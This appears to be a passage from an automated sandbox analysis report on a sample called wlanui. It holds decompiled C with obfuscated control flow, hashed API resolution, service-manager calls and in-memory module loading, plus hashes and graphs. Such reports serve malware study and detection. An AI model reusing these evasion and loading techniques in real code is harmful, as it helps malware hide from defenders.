                                                        							__eflags = _t29;
                                                        							if(_t29 == 0) {
                                                        								_t29 = E00483E60(_t64, E00483F00(0xd9518805), 0x141622d6, _t94);
                                                        								 *0x48dbd8 = _t29;
                                                        							}
                                                        							 *_t29(0, 0x25, 0, 0,  &_v524);
                                                        							_t31 =  *0x48e54c; // 0x2ce0a8
                                                        							_t32 = _t31 + 0x234;
                                                        							__eflags = _t31 + 0x234;
                                                        							E00483040(_t32);
                                                        							goto L41;
                                                        						} else {
                                                        							goto L36;
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							_t37 =  *0x48e494;
                                                        							__eflags = _t37;
                                                        							if(_t37 == 0) {
                                                        								_t37 = E00483E60(_t64, E00483F00(0x9bab0b12), 0x7facde30, _t94);
                                                        								 *0x48e494 = _t37;
                                                        							}
                                                        							_t93 =  *_t37();
                                                        							_t39 =  *0x48dd18;
                                                        							__eflags = _t39;
                                                        							if(_t39 == 0) {
                                                        								_t39 = E00483E60(_t64, E00483F00(0x9bab0b12), 0x9ff0609c, _t94);
                                                        								 *0x48dd18 = _t39;
                                                        							}
                                                        							_t40 =  *_t39(_t93, 8, 0x480);
                                                        							 *0x48e54c = _t40;
                                                        							__eflags = _t40;
                                                        							if(_t40 == 0) {
                                                        								L41:
                                                        								return _t64;
                                                        							} else {
                                                        								 *((intOrPtr*)(_t40 + 4)) = E00487E40;
                                                        								_t28 = 0x13fee53b;
                                                        								goto L1;
                                                        							}
                                                        						} else {
                                                        							__eflags = _t28 - 0x179ed98e;
                                                        							if(_t28 == 0x179ed98e) {
                                                        								__eflags =  *0x48e18c;
                                                        								if( *0x48e18c == 0) {
                                                        									 *0x48e18c = E00483E60(_t64, E00483F00(0x26f5757c), 0x268fe5f0, _t94);
                                                        								}
                                                        								CloseServiceHandle(_t92); // executed
                                                        								_t28 = 0xc0f0991;
                                                        								goto L1;
                                                        							} else {
                                                        								__eflags = _t28 - 0x23c48583;
                                                        								if(_t28 != 0x23c48583) {
                                                        									goto L36;
                                                        								} else {
                                                        									_v528 = 0x5332;
                                                        									_v528 = _v528 << 6;
                                                        									_v528 = _v528 >> 0xf;
                                                        									_v528 = _v528 + 0xffffb18f;
                                                        									_v528 = _v528 >> 3;
                                                        									_v528 = _v528 ^ 0x1ffff62b;
                                                        									_t47 =  *0x48e54c; // 0x2ce0a8
                                                        									 *((intOrPtr*)(_t47 + 8)) = 0x487e30;
                                                        									_t28 = 0xc0f0991;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L42;
                                                        					L36:
                                                        					__eflags = _t28 - 0x305b3459;
                                                        				} while (_t28 != 0x305b3459);
                                                        				return _t64;
                                                        				goto L42;
                                                        			}






























                                                        0x00489868
                                                        0x0048986a
                                                        0x00489871
                                                        0x00489875
                                                        0x00489875
                                                        0x00489878
                                                        0x00489880
                                                        0x00489880
                                                        0x00489880
                                                        0x00489880
                                                        0x00489885
                                                        0x00000000
                                                        0x00000000
                                                        0x0048988b
                                                        0x00489993
                                                        0x00489995
                                                        0x004899ad
                                                        0x004899ad
                                                        0x004899bb
                                                        0x004899bd
                                                        0x004899bf
                                                        0x004899c1
                                                        0x004899d8
                                                        0x004899c3
                                                        0x004899c3
                                                        0x004899c8
                                                        0x004899ce
                                                        0x004899ce
                                                        0x00000000
                                                        0x00489891
                                                        0x00489891
                                                        0x00489896
                                                        0x00489936
                                                        0x0048993b
                                                        0x00000000
                                                        0x00489941
                                                        0x00489941
                                                        0x00489947
                                                        0x00489949
                                                        0x00489961
                                                        0x00489963
                                                        0x00489963
                                                        0x00489969
                                                        0x0048997d
                                                        0x0048997f
                                                        0x00489981
                                                        0x00489986
                                                        0x00000000
                                                        0x00489986
                                                        0x0048989c
                                                        0x0048989c
                                                        0x00489927
                                                        0x0048992c
                                                        0x00000000
                                                        0x004898a2
                                                        0x004898a7
                                                        0x00489905
                                                        0x0048990d
                                                        0x00489912
                                                        0x0048991a
                                                        0x00000000
                                                        0x004898a9
                                                        0x004898ae
                                                        0x00000000
                                                        0x004898b4
                                                        0x004898b4
                                                        0x004898bb
                                                        0x004898ce
                                                        0x004898d3
                                                        0x004898d3
                                                        0x004898e4
                                                        0x004898ea
                                                        0x004898ef
                                                        0x004898f5
                                                        0x004898fb
                                                        0x00000000
                                                        0x004898fb
                                                        0x004898ae
                                                        0x004898a7
                                                        0x0048989c
                                                        0x00489896
                                                        0x00000000
                                                        0x0048988b
                                                        0x004899e2
                                                        0x004899e7
                                                        0x00489ae3
                                                        0x00489ae8
                                                        0x00489b02
                                                        0x00489b07
                                                        0x00489b09
                                                        0x00489b1c
                                                        0x00489b21
                                                        0x00489b21
                                                        0x00489b33
                                                        0x00489b35
                                                        0x00489b3e
                                                        0x00489b3e
                                                        0x00489b44
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004899ed
                                                        0x004899ed
                                                        0x00489a73
                                                        0x00489a78
                                                        0x00489a7a
                                                        0x00489a8d
                                                        0x00489a92
                                                        0x00489a92
                                                        0x00489a99
                                                        0x00489a9b
                                                        0x00489aa0
                                                        0x00489aa2
                                                        0x00489ab5
                                                        0x00489aba
                                                        0x00489aba
                                                        0x00489ac7
                                                        0x00489ac9
                                                        0x00489ace
                                                        0x00489ad0
                                                        0x00489b4f
                                                        0x00489b58
                                                        0x00489ad2
                                                        0x00489ad2
                                                        0x00489ad9
                                                        0x00000000
                                                        0x00489ad9
                                                        0x004899f3
                                                        0x004899f3
                                                        0x004899f8
                                                        0x00489a47
                                                        0x00489a49
                                                        0x00489a61
                                                        0x00489a61
                                                        0x00489a67
                                                        0x00489a69
                                                        0x00000000
                                                        0x004899fa
                                                        0x004899fa
                                                        0x004899ff
                                                        0x00000000
                                                        0x00489a05
                                                        0x00489a05
                                                        0x00489a0d
                                                        0x00489a12
                                                        0x00489a17
                                                        0x00489a1f
                                                        0x00489a24
                                                        0x00489a2c
                                                        0x00489a31
                                                        0x00489a38
                                                        0x00000000
                                                        0x00489a38
                                                        0x004899ff
                                                        0x004899f8
                                                        0x004899ed
                                                        0x00000000
                                                        0x00489aea
                                                        0x00489aea
                                                        0x00489aea
                                                        0x00489b01
                                                        0x00000000

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,002CE090), ref: 0048997D
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 004899BB
                                                        • CloseServiceHandle.ADVAPI32(?,?,3251FEFE,?,?), ref: 00489A67
                                                        • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?,3251FEFE,?,?), ref: 00489B33
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FolderPath$CloseHandleManagerOpenService
                                                        • String ID: 2S$Y4[0
                                                        • API String ID: 2382770032-4131004879
                                                        • Opcode ID: 1c28efd76755ec73549aabe951847f62883a5d0dad7f67930b4091577e84b1c8
                                                        • Instruction ID: cfa66bbbd72260fdad5381044d96bcb5c07835bd81d1921ea5a11627232b61ef
                                                        • Opcode Fuzzy Hash: 1c28efd76755ec73549aabe951847f62883a5d0dad7f67930b4091577e84b1c8
                                                        • Instruction Fuzzy Hash: 5361D270B046015BDB18BF69989573F3295EB90B08F180C2FF606DB391EA38DD05979E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 229 488400-4884df 230 4884e3-4884e9 229->230 231 4885c8-4885ce 230->231 232 4884ef 230->232 233 488630-488637 231->233 234 4885d0-4885d6 231->234 235 48866c-4886b4 call 48b6e0 232->235 236 4884f5-4884fb 232->236 242 488639-48864f call 483f00 call 483e60 233->242 243 488654-488667 233->243 237 4885d8-4885e0 234->237 238 4885b1-4885b7 234->238 250 4885bd-4885c7 235->250 256 4886ba 235->256 239 48854a-488551 236->239 240 4884fd-488503 236->240 244 488600-488624 CreateFileW 237->244 245 4885e2-4885fa call 483f00 call 483e60 237->245 238->230 238->250 251 48856e-488591 239->251 252 488553-488569 call 483f00 call 483e60 239->252 246 488543-488548 240->246 247 488505-48850b 240->247 242->243 243->230 244->250 257 488626-48862b 244->257 245->244 246->230 247->238 255 488511-488518 247->255 271 4885ae 251->271 272 488593-4885a9 call 483f00 call 483e60 251->272 252->251 262 48851a-488530 call 483f00 call 483e60 255->262 263 488535-488541 255->263 265 4886bc-4886be 256->265 266 4886c4-4886d1 256->266 257->230 262->263 263->230 265->250 265->266 271->238 272->271
                                                        C-Code - Quality: 66%
                                                        			E00488400(void* __ebx, void* __ebp) {
                                                        				short _v524;
                                                        				char _v564;
                                                        				char _v572;
                                                        				struct _SECURITY_ATTRIBUTES* _v576;
                                                        				signed int _v580;
                                                        				signed int _v584;
                                                        				signed int _v588;
                                                        				signed int _v592;
                                                        				intOrPtr _v596;
                                                        				intOrPtr* _t75;
                                                        				intOrPtr* _t82;
                                                        				intOrPtr* _t85;
                                                        				void* _t92;
                                                        				intOrPtr* _t93;
                                                        				void* _t95;
                                                        				void* _t97;
                                                        				void* _t98;
                                                        				void* _t99;
                                                        				void* _t100;
                                                        				void* _t101;
                                                        				signed int _t119;
                                                        				void* _t121;
                                                        				void* _t122;
                                                        				signed int _t123;
                                                        				intOrPtr _t124;
                                                        				void* _t126;
                                                        				void* _t129;
                                                        
                                                        				_t126 = __ebp;
                                                        				_t101 = __ebx;
                                                        				_v584 = 0xdbec;
                                                        				_v584 = _v584 + 0xa437;
                                                        				_v584 = _v584 | 0x0afcf5fb;
                                                        				_v584 = _v584 ^ 0x9493ba05;
                                                        				_v584 = _v584 >> 0xc;
                                                        				_v584 = _v584 >> 0xb;
                                                        				_v584 = _v584 ^ 0x000001bc;
                                                        				_v592 = 0x7d19;
                                                        				_v592 = _v592 << 9;
                                                        				_v592 = _v592 >> 0xe;
                                                        				_v592 = _v592 + 0xffff07e5;
                                                        				_v592 = _v592 | 0x8aea6eef;
                                                        				_v592 = _v592 + 0xd867;
                                                        				_v592 = _v592 + 0x9c41;
                                                        				_v592 = _v592 + 0x3de0;
                                                        				_v592 = _v592 + 0x218b;
                                                        				_v592 = _v592 ^ 0x00014403;
                                                        				_v588 = 0x2591;
                                                        				_t123 = 0x4a20241;
                                                        				_v588 = _v588 * 0x7d;
                                                        				_v588 = _v588 + 0x8d68;
                                                        				_v588 = _v588 + 0xffff8911;
                                                        				_v588 = _v588 * 0x6a;
                                                        				_v588 = _v588 + 0xffff93d5;
                                                        				_v588 = _v588 ^ 0x07a13cd2;
                                                        				_v580 = 0x789;
                                                        				_v580 = _v580 >> 1;
                                                        				_v580 = _v580 ^ 0xaee58af2;
                                                        				_v580 = _v580 ^ 0xaee58936;
                                                        				_t122 = _v580;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t129 = _t123 - 0x1aed34c4;
                                                        						if(_t129 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t129 == 0) {
                                                        							_v580 = 0xa8c00;
                                                        							_v576 = 0;
                                                        							_v596 = E0048B6E0(_v580, _v576, 0x989680, 0);
                                                        							_v592 = _t119;
                                                        							_t121 = _v588 - _v564;
                                                        							_t124 = _v596;
                                                        							asm("sbb ecx, [esp+0x3c]");
                                                        							__eflags = _v584 - _v592;
                                                        							if(__eflags < 0) {
                                                        								goto L16;
                                                        							} else {
                                                        								if(__eflags > 0) {
                                                        									L29:
                                                        									return 1;
                                                        								} else {
                                                        									__eflags = _t121 - _t124;
                                                        									if(_t121 < _t124) {
                                                        										goto L16;
                                                        									} else {
                                                        										goto L29;
                                                        									}
                                                        								}
                                                        							}
                                                        						} else {
                                                        							if(_t123 == 0x12f5064) {
                                                        								_t82 =  *0x48dec0;
                                                        								__eflags = _t82;
                                                        								if(_t82 == 0) {
                                                        									_t99 = E00483F00(0x9bab0b12);
                                                        									_t119 = 0x8b0c7279;
                                                        									_t82 = E00483E60(_t101, _t99, 0x8b0c7279, _t126);
                                                        									 *0x48dec0 = _t82;
                                                        								}
                                                        								 *_t82(_t122, 0,  &_v564, 0x28);
                                                        								asm("sbb esi, esi");
                                                        								_t85 =  *0x48de3c;
                                                        								_t123 = (_t123 & 0xf96a5287) + 0x13ef6fdf;
                                                        								__eflags = _t85;
                                                        								if(_t85 == 0) {
                                                        									_t98 = E00483F00(0x9bab0b12);
                                                        									_t119 = 0x20de7595;
                                                        									_t85 = E00483E60(_t101, _t98, 0x20de7595, _t126);
                                                        									 *0x48de3c = _t85;
                                                        								}
                                                        								 *_t85(_t122);
                                                        								goto L15;
                                                        							} else {
                                                        								if(_t123 == 0x4a20241) {
                                                        									_t123 = 0x33602029;
                                                        									continue;
                                                        								} else {
                                                        									if(_t123 != 0xd59c266) {
                                                        										goto L15;
                                                        									} else {
                                                        										_t93 =  *0x48e1d4;
                                                        										if(_t93 == 0) {
                                                        											_t97 = E00483F00(0x9bab0b12);
                                                        											_t119 = 0xa229df38;
                                                        											_t93 = E00483E60(_t101, _t97, 0xa229df38, _t126);
                                                        											 *0x48e1d4 = _t93;
                                                        										}
                                                        										 *_t93( &_v572);
                                                        										_t123 = 0x1aed34c4;
                                                        										continue;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L30:
                                                        					}
                                                        					__eflags = _t123 - 0x33602029;
                                                        					if(_t123 == 0x33602029) {
                                                        						_t75 =  *0x48e3f4;
                                                        						__eflags = _t75;
                                                        						if(_t75 == 0) {
                                                        							_t100 = E00483F00(0x9bab0b12);
                                                        							_t119 = 0x7dc9b9bb;
                                                        							_t75 = E00483E60(_t101, _t100, 0x7dc9b9bb, _t126);
                                                        							 *0x48e3f4 = _t75;
                                                        						}
                                                        						 *_t75(0,  &_v524, 0x104);
                                                        						_t123 = 0x3ae77736;
                                                        						goto L1;
                                                        					} else {
                                                        						__eflags = _t123 - 0x3ae77736;
                                                        						if(_t123 != 0x3ae77736) {
                                                        							goto L15;
                                                        						} else {
                                                        							__eflags =  *0x48de04;
                                                        							if( *0x48de04 == 0) {
                                                        								_t95 = E00483F00(0x9bab0b12);
                                                        								_t119 = 0xb66d748a;
                                                        								 *0x48de04 = E00483E60(_t101, _t95, 0xb66d748a, _t126);
                                                        							}
                                                        							_t92 = CreateFileW( &_v524, _v584, _v592, 0, _v588, _v580, 0); // executed
                                                        							_t122 = _t92;
                                                        							__eflags = _t122 - 0xffffffff;
                                                        							if(_t122 == 0xffffffff) {
                                                        								break;
                                                        							} else {
                                                        								_t123 = 0x12f5064;
                                                        								goto L1;
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L30;
                                                        					L15:
                                                        					__eflags = _t123 - 0x13ef6fdf;
                                                        				} while (_t123 != 0x13ef6fdf);
                                                        				L16:
                                                        				__eflags = 0;
                                                        				return 0;
                                                        				goto L30;
                                                        			}






























                                                        0x00488400
                                                        0x00488400
                                                        0x00488406
                                                        0x0048840e
                                                        0x00488416
                                                        0x0048841e
                                                        0x00488426
                                                        0x0048842b
                                                        0x00488430
                                                        0x00488438
                                                        0x00488440
                                                        0x00488445
                                                        0x0048844a
                                                        0x00488452
                                                        0x0048845a
                                                        0x00488462
                                                        0x0048846a
                                                        0x00488472
                                                        0x0048847a
                                                        0x00488482
                                                        0x00488491
                                                        0x00488496
                                                        0x0048849a
                                                        0x004884a2
                                                        0x004884af
                                                        0x004884b3
                                                        0x004884bb
                                                        0x004884c3
                                                        0x004884cb
                                                        0x004884cf
                                                        0x004884d7
                                                        0x004884df
                                                        0x004884df
                                                        0x004884e3
                                                        0x004884e3
                                                        0x004884e3
                                                        0x004884e3
                                                        0x004884e9
                                                        0x00000000
                                                        0x00000000
                                                        0x004884ef
                                                        0x0048866e
                                                        0x00488676
                                                        0x00488696
                                                        0x0048869a
                                                        0x004886a2
                                                        0x004886a6
                                                        0x004886aa
                                                        0x004886b2
                                                        0x004886b4
                                                        0x00000000
                                                        0x004886ba
                                                        0x004886ba
                                                        0x004886c5
                                                        0x004886d1
                                                        0x004886bc
                                                        0x004886bc
                                                        0x004886be
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004886be
                                                        0x004886ba
                                                        0x004884f5
                                                        0x004884fb
                                                        0x0048854a
                                                        0x0048854f
                                                        0x00488551
                                                        0x00488558
                                                        0x0048855d
                                                        0x00488564
                                                        0x00488569
                                                        0x00488569
                                                        0x00488578
                                                        0x0048857c
                                                        0x0048857e
                                                        0x00488589
                                                        0x0048858f
                                                        0x00488591
                                                        0x00488598
                                                        0x0048859d
                                                        0x004885a4
                                                        0x004885a9
                                                        0x004885a9
                                                        0x004885af
                                                        0x00000000
                                                        0x004884fd
                                                        0x00488503
                                                        0x00488543
                                                        0x00000000
                                                        0x00488505
                                                        0x0048850b
                                                        0x00000000
                                                        0x00488511
                                                        0x00488511
                                                        0x00488518
                                                        0x0048851f
                                                        0x00488524
                                                        0x0048852b
                                                        0x00488530
                                                        0x00488530
                                                        0x0048853a
                                                        0x0048853c
                                                        0x00000000
                                                        0x0048853c
                                                        0x0048850b
                                                        0x00488503
                                                        0x004884fb
                                                        0x00000000
                                                        0x004884ef
                                                        0x004885c8
                                                        0x004885ce
                                                        0x00488630
                                                        0x00488635
                                                        0x00488637
                                                        0x0048863e
                                                        0x00488643
                                                        0x0048864a
                                                        0x0048864f
                                                        0x0048864f
                                                        0x00488660
                                                        0x00488662
                                                        0x00000000
                                                        0x004885d0
                                                        0x004885d0
                                                        0x004885d6
                                                        0x00000000
                                                        0x004885d8
                                                        0x004885de
                                                        0x004885e0
                                                        0x004885e7
                                                        0x004885ec
                                                        0x004885fa
                                                        0x004885fa
                                                        0x0048861d
                                                        0x0048861f
                                                        0x00488621
                                                        0x00488624
                                                        0x00000000
                                                        0x00488626
                                                        0x00488626
                                                        0x00000000
                                                        0x00488626
                                                        0x00488624
                                                        0x004885d6
                                                        0x00000000
                                                        0x004885b1
                                                        0x004885b1
                                                        0x004885b1
                                                        0x004885bd
                                                        0x004885bd
                                                        0x004885c7
                                                        0x00000000

                                                        APIs
                                                        • CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000,?,3251FEFE), ref: 0048861D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: ) `3$) `3$6w:$6w:$=
                                                        • API String ID: 823142352-4124229693
                                                        • Opcode ID: a5a759ea35137b7943c6cfcd25b86c10405ba6961c7497123c9102769c496a88
                                                        • Instruction ID: 9da8ac49030be37bca3f176df4ff0e195158475f46f9e8fa5770e71ce50b1dc4
                                                        • Opcode Fuzzy Hash: a5a759ea35137b7943c6cfcd25b86c10405ba6961c7497123c9102769c496a88
                                                        • Instruction Fuzzy Hash: F661F571A083129FC714EF69C94562FB7E5ABE0718F408C1EF59997290EB78CD058F8A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 284 460d60-460dd5 call 460ed0 VirtualAlloc RtlMoveMemory 288 460ebe-460ec4 284->288 289 460ddb-460dde 284->289 289->288 290 460de4-460de6 289->290 290->288 291 460dec-460df0 290->291 291->288 293 460df6-460dfd 291->293 294 460e03-460e36 call 461140 RtlMoveMemory 293->294 295 460eaf-460ebb 293->295 294->288 299 460e3c-460e4a VirtualAlloc 294->299 300 460e4c-460e52 299->300 301 460e89-460ea0 RtlFillMemory 299->301 302 460e54-460e56 300->302 303 460e5a-460e68 300->303 301->288 306 460ea2-460ea5 301->306 302->303 303->288 305 460e6a-460e7d RtlMoveMemory 303->305 305->288 307 460e7f-460e83 305->307 306->288 308 460ea7-460ea9 306->308 307->288 309 460e85 307->309 308->294 308->295 309->301
                                                        APIs
                                                          • Part of subcall function 00460FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00460F08
                                                          • Part of subcall function 00460FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00460F3E
                                                          • Part of subcall function 00460FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00460F7F
                                                        • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 00460DB4
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00460DC3
                                                          • Part of subcall function 00461140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,00460EFD,00000000), ref: 00461155
                                                        • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 00460E11
                                                        • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 00460E3D
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00460E6C
                                                        • RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 00460E98
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335360642.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_460000_wlanui.jbxd
                                                        Similarity
                                                        • API ID: Memory$Move$AllocVirtual$Filllstrcpyn
                                                        • String ID:
                                                        • API String ID: 3581289920-0
                                                        • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction ID: 6d93d3069dbfeab79e940599e26b22b5accb09dc885d9078bc5b271b94a1f879
                                                        • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction Fuzzy Hash: 3731B271A043506BD724DB61C944AAB73E9EBC8385F040D2EB549D3351F73AD881876B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 310 487120 311 487125-48712a 310->311 312 487130 311->312 313 4871b4-4871b9 311->313 314 487233-487248 call 4834c0 312->314 315 487136-48713b 312->315 316 4871bb 313->316 317 487207-48720c 313->317 334 48724a-487260 call 483f00 call 483e60 314->334 335 487265-487278 LoadLibraryW 314->335 320 48713d 315->320 321 487190-487195 315->321 323 4871bd-4871c2 316->323 324 4871ee-487202 call 487080 316->324 318 48720e-487222 call 487080 317->318 319 487227-48722c 317->319 318->311 319->311 328 487232 319->328 329 48717a-48718e call 487080 320->329 330 48713f-487144 320->330 321->319 327 48719b-4871af call 487080 321->327 332 4871c4-4871c9 323->332 333 4871d5-4871e9 call 487080 323->333 324->311 327->311 329->311 342 487164-487178 call 487080 330->342 343 487146-48714b 330->343 332->319 336 4871cb-4871d0 332->336 333->311 334->335 347 48727a-487290 call 483f00 call 483e60 335->347 348 487295-4872a0 335->348 336->311 342->311 343->319 351 487151-487162 call 487080 343->351 347->348 362 4872bd-4872c5 348->362 363 4872a2-4872b8 call 483f00 call 483e60 348->363 351->311 363->362
                                                        C-Code - Quality: 85%
                                                        			E00487120(void* __ebx) {
                                                        				void* _t2;
                                                        				struct HINSTANCE__* _t8;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr* _t11;
                                                        				void* _t21;
                                                        				intOrPtr _t23;
                                                        				void* _t48;
                                                        				WCHAR* _t51;
                                                        				void* _t53;
                                                        				void* _t54;
                                                        				void* _t55;
                                                        
                                                        				_t21 = __ebx;
                                                        				_t2 = 0x291da748;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t54 = _t2 - 0x1a8031ec;
                                                        						if(_t54 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t54 == 0) {
                                                        							_t51 = E004834C0(0x48d830);
                                                        							__eflags =  *0x48dd1c;
                                                        							if( *0x48dd1c == 0) {
                                                        								 *0x48dd1c = E00483E60(_t21, E00483F00(0x9bab0b12), 0xe4b28d97, _t53);
                                                        							}
                                                        							_t8 = LoadLibraryW(_t51);
                                                        							_t23 =  *0x48e548; // 0x307e60
                                                        							 *(_t23 + 0x4c) = _t8;
                                                        							_t9 =  *0x48e494;
                                                        							__eflags = _t9;
                                                        							if(_t9 == 0) {
                                                        								_t9 = E00483E60(_t21, E00483F00(0x9bab0b12), 0x7facde30, _t53);
                                                        								 *0x48e494 = _t9;
                                                        							}
                                                        							_t48 =  *_t9();
                                                        							_t11 =  *0x48df30;
                                                        							__eflags = _t11;
                                                        							if(_t11 == 0) {
                                                        								_t11 = E00483E60(_t21, E00483F00(0x9bab0b12), 0x5010a54d, _t53);
                                                        								 *0x48df30 = _t11;
                                                        							}
                                                        							return  *_t11(_t48, 0, _t51);
                                                        						} else {
                                                        							_t55 = _t2 - 0x185e9846;
                                                        							if(_t55 > 0) {
                                                        								__eflags = _t2 - 0x18843476;
                                                        								if(__eflags != 0) {
                                                        									goto L21;
                                                        								} else {
                                                        									E00487080(_t21, 0x48d7a0, 4, __eflags);
                                                        									_t2 = 0x2eb73d4f;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t55 == 0) {
                                                        									E00487080(_t21, 0x48d8f0, 2, __eflags);
                                                        									_t2 = 0x9da2520;
                                                        									continue;
                                                        								} else {
                                                        									if(_t2 == 0x9da2520) {
                                                        										E00487080(_t21, 0x48d800, 3, __eflags);
                                                        										_t2 = 0x18843476;
                                                        										continue;
                                                        									} else {
                                                        										_t57 = _t2 - 0x15a7f569;
                                                        										if(_t2 != 0x15a7f569) {
                                                        											goto L21;
                                                        										} else {
                                                        											E00487080(_t21, 0x48d860, 0, _t57);
                                                        											_t2 = 0x39797244;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L30:
                                                        					}
                                                        					__eflags = _t2 - 0x2eb73d4f;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t2 - 0x39797244;
                                                        						if(__eflags != 0) {
                                                        							goto L21;
                                                        						} else {
                                                        							E00487080(_t21, 0x48d890, 1, __eflags);
                                                        							_t2 = 0x185e9846;
                                                        							goto L1;
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							E00487080(_t21, 0x48d7e0, 5, __eflags);
                                                        							_t2 = 0x22a44863;
                                                        							goto L1;
                                                        						} else {
                                                        							__eflags = _t2 - 0x22a44863;
                                                        							if(__eflags == 0) {
                                                        								E00487080(_t21, 0x48d8c0, 6, __eflags);
                                                        								_t2 = 0x1a8031ec;
                                                        								goto L1;
                                                        							} else {
                                                        								__eflags = _t2 - 0x291da748;
                                                        								if(__eflags != 0) {
                                                        									goto L21;
                                                        								} else {
                                                        									_t2 = 0x15a7f569;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L30;
                                                        					L21:
                                                        					__eflags = _t2 - 0x21acdd7e;
                                                        				} while (__eflags != 0);
                                                        				return _t2;
                                                        				goto L30;
                                                        			}














                                                        0x00487120
                                                        0x00487120
                                                        0x00487120
                                                        0x00487125
                                                        0x00487125
                                                        0x00487125
                                                        0x00487125
                                                        0x0048712a
                                                        0x00000000
                                                        0x00000000
                                                        0x00487130
                                                        0x0048723f
                                                        0x00487246
                                                        0x00487248
                                                        0x00487260
                                                        0x00487260
                                                        0x00487266
                                                        0x00487268
                                                        0x0048726e
                                                        0x00487271
                                                        0x00487276
                                                        0x00487278
                                                        0x0048728b
                                                        0x00487290
                                                        0x00487290
                                                        0x00487297
                                                        0x00487299
                                                        0x0048729e
                                                        0x004872a0
                                                        0x004872b3
                                                        0x004872b8
                                                        0x004872b8
                                                        0x004872c5
                                                        0x00487136
                                                        0x00487136
                                                        0x0048713b
                                                        0x00487190
                                                        0x00487195
                                                        0x00000000
                                                        0x0048719b
                                                        0x004871a5
                                                        0x004871aa
                                                        0x00000000
                                                        0x004871aa
                                                        0x0048713d
                                                        0x0048713d
                                                        0x00487184
                                                        0x00487189
                                                        0x00000000
                                                        0x0048713f
                                                        0x00487144
                                                        0x0048716e
                                                        0x00487173
                                                        0x00000000
                                                        0x00487146
                                                        0x00487146
                                                        0x0048714b
                                                        0x00000000
                                                        0x00487151
                                                        0x00487158
                                                        0x0048715d
                                                        0x00000000
                                                        0x0048715d
                                                        0x0048714b
                                                        0x00487144
                                                        0x0048713d
                                                        0x0048713b
                                                        0x00000000
                                                        0x00487130
                                                        0x004871b4
                                                        0x004871b9
                                                        0x00487207
                                                        0x0048720c
                                                        0x00000000
                                                        0x0048720e
                                                        0x00487218
                                                        0x0048721d
                                                        0x00000000
                                                        0x0048721d
                                                        0x004871bb
                                                        0x004871bb
                                                        0x004871f8
                                                        0x004871fd
                                                        0x00000000
                                                        0x004871bd
                                                        0x004871bd
                                                        0x004871c2
                                                        0x004871df
                                                        0x004871e4
                                                        0x00000000
                                                        0x004871c4
                                                        0x004871c4
                                                        0x004871c9
                                                        0x00000000
                                                        0x004871cb
                                                        0x004871cb
                                                        0x00000000
